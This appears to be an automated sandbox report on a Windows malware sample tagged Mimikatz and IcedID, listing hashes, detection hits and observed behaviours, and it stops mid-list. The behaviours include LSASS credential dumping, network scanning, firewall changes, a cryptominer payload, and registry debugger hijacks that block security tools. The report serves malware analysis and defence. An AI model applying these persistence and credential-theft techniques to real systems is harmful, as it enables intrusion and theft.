Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
28-08-2024 12:41
Behavioral task
behavioral1
Sample
2024-08-28_3a4334a6ea258acf38a875d5c1c3e553_hacktools_icedid_mimikatz.exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
2024-08-28_3a4334a6ea258acf38a875d5c1c3e553_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20240802-en
General
-
Target
2024-08-28_3a4334a6ea258acf38a875d5c1c3e553_hacktools_icedid_mimikatz.exe
-
Size
9.0MB
-
MD5
3a4334a6ea258acf38a875d5c1c3e553
-
SHA1
1a5f126ce7da0a4d6f2c1ac32d4dba0f6c5815f6
-
SHA256
df4c3fa78cea2344b7cba24088adc7da1d6f4d642c73b770bcc05b3210e2f378
-
SHA512
4d4c24993bf45cdf1f2e5f451d4832e3a6529b8248eed4421dad851087726d43331b622f598a2729a949bad9f5fd6da7b37c5b59d129f4d06447812ba33d7f9d
-
SSDEEP
196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 740 created 1724 740 bbhcwec.exe 37 -
Contacts a large (19018) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 10 IoCs
resource yara_rule behavioral2/memory/3276-178-0x00007FF75D170000-0x00007FF75D290000-memory.dmp xmrig behavioral2/memory/3276-182-0x00007FF75D170000-0x00007FF75D290000-memory.dmp xmrig behavioral2/memory/3276-200-0x00007FF75D170000-0x00007FF75D290000-memory.dmp xmrig behavioral2/memory/3276-212-0x00007FF75D170000-0x00007FF75D290000-memory.dmp xmrig behavioral2/memory/3276-225-0x00007FF75D170000-0x00007FF75D290000-memory.dmp xmrig behavioral2/memory/3276-234-0x00007FF75D170000-0x00007FF75D290000-memory.dmp xmrig behavioral2/memory/3276-249-0x00007FF75D170000-0x00007FF75D290000-memory.dmp xmrig behavioral2/memory/3276-264-0x00007FF75D170000-0x00007FF75D290000-memory.dmp xmrig behavioral2/memory/3276-265-0x00007FF75D170000-0x00007FF75D290000-memory.dmp xmrig behavioral2/memory/3276-266-0x00007FF75D170000-0x00007FF75D290000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/1788-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/1788-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x000700000002344d-6.dat mimikatz behavioral2/memory/4832-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/904-138-0x00007FF6E0C40000-0x00007FF6E0D2E000-memory.dmp mimikatz -
Drops file in Drivers directory 2 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts bbhcwec.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbhcwec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbhcwec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe bbhcwec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe bbhcwec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbhcwec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe bbhcwec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe bbhcwec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbhcwec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe bbhcwec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe bbhcwec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe bbhcwec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbhcwec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbhcwec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe bbhcwec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe bbhcwec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe bbhcwec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbhcwec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbhcwec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbhcwec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbhcwec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe bbhcwec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe bbhcwec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbhcwec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbhcwec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbhcwec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe bbhcwec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbhcwec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbhcwec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe bbhcwec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbhcwec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbhcwec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe bbhcwec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbhcwec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbhcwec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbhcwec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe bbhcwec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe bbhcwec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe bbhcwec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe bbhcwec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe bbhcwec.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 3968 netsh.exe 2288 netsh.exe -
Executes dropped EXE 29 IoCs
pid Process 4832 bbhcwec.exe 740 bbhcwec.exe 1768 wpcap.exe 3936 cgpziiqcb.exe 904 vfshost.exe 3756 bculvvitc.exe 3428 xohudmc.exe 2224 ditzew.exe 3276 zcppya.exe 4264 bculvvitc.exe 4360 bculvvitc.exe 1756 bculvvitc.exe 2560 bculvvitc.exe 4500 bculvvitc.exe 3584 bculvvitc.exe 1392 bculvvitc.exe 3420 bculvvitc.exe 3236 bculvvitc.exe 2016 bculvvitc.exe 4264 bbhcwec.exe 1376 bculvvitc.exe 4132 bculvvitc.exe 3568 bculvvitc.exe 1044 bculvvitc.exe 3964 bculvvitc.exe 4488 bculvvitc.exe 4584 bculvvitc.exe 1308 zzahwermh.exe 5096 bbhcwec.exe -
Loads dropped DLL 12 IoCs
pid Process 1768 wpcap.exe 1768 wpcap.exe 1768 wpcap.exe 1768 wpcap.exe 1768 wpcap.exe 1768 wpcap.exe 1768 wpcap.exe 1768 wpcap.exe 1768 wpcap.exe 3936 cgpziiqcb.exe 3936 cgpziiqcb.exe 3936 cgpziiqcb.exe -
resource yara_rule behavioral2/files/0x000700000002349e-134.dat upx behavioral2/memory/904-135-0x00007FF6E0C40000-0x00007FF6E0D2E000-memory.dmp upx behavioral2/memory/904-138-0x00007FF6E0C40000-0x00007FF6E0D2E000-memory.dmp upx behavioral2/files/0x00070000000234a9-141.dat upx behavioral2/memory/3756-142-0x00007FF65B9C0000-0x00007FF65BA1B000-memory.dmp upx behavioral2/memory/3756-146-0x00007FF65B9C0000-0x00007FF65BA1B000-memory.dmp upx behavioral2/files/0x00070000000234a6-163.dat upx behavioral2/memory/3276-164-0x00007FF75D170000-0x00007FF75D290000-memory.dmp upx behavioral2/memory/4264-171-0x00007FF65B9C0000-0x00007FF65BA1B000-memory.dmp upx behavioral2/memory/4360-175-0x00007FF65B9C0000-0x00007FF65BA1B000-memory.dmp upx behavioral2/memory/3276-178-0x00007FF75D170000-0x00007FF75D290000-memory.dmp upx behavioral2/memory/1756-180-0x00007FF65B9C0000-0x00007FF65BA1B000-memory.dmp upx behavioral2/memory/3276-182-0x00007FF75D170000-0x00007FF75D290000-memory.dmp upx behavioral2/memory/2560-185-0x00007FF65B9C0000-0x00007FF65BA1B000-memory.dmp upx behavioral2/memory/4500-189-0x00007FF65B9C0000-0x00007FF65BA1B000-memory.dmp upx behavioral2/memory/3584-193-0x00007FF65B9C0000-0x00007FF65BA1B000-memory.dmp upx behavioral2/memory/1392-197-0x00007FF65B9C0000-0x00007FF65BA1B000-memory.dmp upx behavioral2/memory/3276-200-0x00007FF75D170000-0x00007FF75D290000-memory.dmp upx behavioral2/memory/3420-202-0x00007FF65B9C0000-0x00007FF65BA1B000-memory.dmp upx behavioral2/memory/3236-206-0x00007FF65B9C0000-0x00007FF65BA1B000-memory.dmp upx behavioral2/memory/2016-210-0x00007FF65B9C0000-0x00007FF65BA1B000-memory.dmp upx behavioral2/memory/3276-212-0x00007FF75D170000-0x00007FF75D290000-memory.dmp upx behavioral2/memory/1376-219-0x00007FF65B9C0000-0x00007FF65BA1B000-memory.dmp upx behavioral2/memory/4132-223-0x00007FF65B9C0000-0x00007FF65BA1B000-memory.dmp upx behavioral2/memory/3276-225-0x00007FF75D170000-0x00007FF75D290000-memory.dmp upx behavioral2/memory/3568-228-0x00007FF65B9C0000-0x00007FF65BA1B000-memory.dmp upx behavioral2/memory/1044-231-0x00007FF65B9C0000-0x00007FF65BA1B000-memory.dmp upx behavioral2/memory/3964-233-0x00007FF65B9C0000-0x00007FF65BA1B000-memory.dmp upx behavioral2/memory/3276-234-0x00007FF75D170000-0x00007FF75D290000-memory.dmp upx behavioral2/memory/4488-236-0x00007FF65B9C0000-0x00007FF65BA1B000-memory.dmp upx behavioral2/memory/4584-238-0x00007FF65B9C0000-0x00007FF65BA1B000-memory.dmp upx behavioral2/memory/3276-249-0x00007FF75D170000-0x00007FF75D290000-memory.dmp upx behavioral2/memory/3276-264-0x00007FF75D170000-0x00007FF75D290000-memory.dmp upx behavioral2/memory/3276-265-0x00007FF75D170000-0x00007FF75D290000-memory.dmp upx behavioral2/memory/3276-266-0x00007FF75D170000-0x00007FF75D290000-memory.dmp upx -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 93 ifconfig.me 94 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\ditzew.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 bbhcwec.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDAB91A53CE5876D153BF0B6B3BA7DCE bbhcwec.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 bbhcwec.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache bbhcwec.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\ditzew.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData bbhcwec.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE bbhcwec.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies bbhcwec.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft bbhcwec.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 bbhcwec.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content bbhcwec.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDAB91A53CE5876D153BF0B6B3BA7DCE bbhcwec.exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\nlmyhmmcu\UnattendGC\svschost.xml bbhcwec.exe File opened for modification C:\Windows\rgmymecw\spoolsrv.xml bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\AppCapture32.dll bbhcwec.exe File created C:\Windows\nlmyhmmcu\Corporate\vfshost.exe bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\vimpcsvc.xml bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\specials\docmicfg.xml bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\AppCapture64.dll bbhcwec.exe File created C:\Windows\nlmyhmmcu\ycmckpemz\wpcap.dll bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\specials\docmicfg.exe bbhcwec.exe File created C:\Windows\rgmymecw\schoedcl.xml bbhcwec.exe File created C:\Windows\nlmyhmmcu\Corporate\mimidrv.sys bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\spoolsrv.xml bbhcwec.exe File created C:\Windows\rgmymecw\vimpcsvc.xml bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\specials\crli-0.dll bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\specials\trfo-2.dll bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\specials\svschost.exe bbhcwec.exe File created C:\Windows\nlmyhmmcu\ycmckpemz\scan.bat bbhcwec.exe File created C:\Windows\nlmyhmmcu\ycmckpemz\cgpziiqcb.exe bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\specials\schoedcl.exe bbhcwec.exe File created C:\Windows\nlmyhmmcu\Corporate\mimilib.dll bbhcwec.exe File opened for modification C:\Windows\nlmyhmmcu\Corporate\log.txt cmd.exe File opened for modification C:\Windows\nlmyhmmcu\ycmckpemz\Result.txt zzahwermh.exe File created C:\Windows\rgmymecw\bbhcwec.exe 2024-08-28_3a4334a6ea258acf38a875d5c1c3e553_hacktools_icedid_mimikatz.exe File created C:\Windows\nlmyhmmcu\UnattendGC\specials\exma-1.dll bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\specials\tibe-2.dll bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\specials\vimpcsvc.exe bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\specials\cnli-1.dll bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\specials\coli-0.dll bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\specials\trch-1.dll bbhcwec.exe File opened for modification C:\Windows\rgmymecw\docmicfg.xml bbhcwec.exe File created C:\Windows\nlmyhmmcu\ycmckpemz\wpcap.exe bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\specials\ssleay32.dll bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\specials\tucl-1.dll bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\specials\spoolsrv.exe bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\specials\libxml2.dll bbhcwec.exe File created C:\Windows\nlmyhmmcu\ycmckpemz\ip.txt bbhcwec.exe File created C:\Windows\nlmyhmmcu\upbdrjv\swrpwe.exe bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\specials\libeay32.dll bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\specials\ucl.dll bbhcwec.exe File created C:\Windows\rgmymecw\spoolsrv.xml bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\Shellcode.ini bbhcwec.exe File created C:\Windows\nlmyhmmcu\ycmckpemz\zzahwermh.exe bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\specials\spoolsrv.xml bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\specials\vimpcsvc.xml bbhcwec.exe File created C:\Windows\rgmymecw\svschost.xml bbhcwec.exe File created C:\Windows\nlmyhmmcu\ycmckpemz\Packet.dll bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\specials\posh-0.dll bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\schoedcl.xml bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\specials\svschost.xml bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\specials\zlib1.dll bbhcwec.exe File opened for modification C:\Windows\rgmymecw\schoedcl.xml bbhcwec.exe File created C:\Windows\ime\bbhcwec.exe bbhcwec.exe File opened for modification C:\Windows\rgmymecw\vimpcsvc.xml bbhcwec.exe File opened for modification C:\Windows\rgmymecw\bbhcwec.exe 2024-08-28_3a4334a6ea258acf38a875d5c1c3e553_hacktools_icedid_mimikatz.exe File opened for modification C:\Windows\nlmyhmmcu\ycmckpemz\Packet.dll bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\docmicfg.xml bbhcwec.exe File opened for modification C:\Windows\rgmymecw\svschost.xml bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\specials\xdvl-0.dll bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\specials\schoedcl.xml bbhcwec.exe File created C:\Windows\rgmymecw\docmicfg.xml bbhcwec.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3156 sc.exe 4776 sc.exe 3420 sc.exe 436 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2024-08-28_3a4334a6ea258acf38a875d5c1c3e553_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened 